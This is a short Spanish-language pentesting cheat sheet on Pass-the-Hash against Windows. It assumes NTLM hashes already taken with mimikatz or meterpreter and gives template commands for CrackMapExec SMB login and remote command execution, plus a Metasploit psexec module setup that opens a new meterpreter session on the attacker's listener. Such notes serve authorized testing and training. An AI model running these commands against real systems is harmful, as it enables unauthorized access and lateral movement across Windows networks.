Pass-The-Hash (Windows)

Pass the Hash es una técnica utilizada para acceder a un sistema protegido sin necesidad de conocer la contraseña en texto plano del usuario. En lugar de esto, el atacante aprovecha los hash de las contraseñas que ya están almacenados y los utiliza para autenticarse.

En este ataque, partimos de haber obtenido el hash NTLM, ya sea con mimikatz, con kiwi, con el comando hashdump de meterpreter o cualquier otra herramienta

Explotación con CrackMapExec (Necesitamos solo el hash NTLM)

crackmapexec smb <IP> -u <user> -H “<NTLM hash>”

Para ejecutar comandos

crackmapexec smb -u -H “” -x “<comando”>

Explotación con Psexec en Metasploit (Necesitamos el LM y NTLM hash)

Módulo a utilizar: exploit/windows/smb/psexec

use exploit/windows/smb/psexec
set LPORT <Puerto libre local> (Ya que recibiremos otra sesión de meterpreter nueva)
set RHOSTS <IP vícitma>
set SMBUser <user>
set SMBPass <hash NTLM>
set target Native\ upload
exploit

Última actualización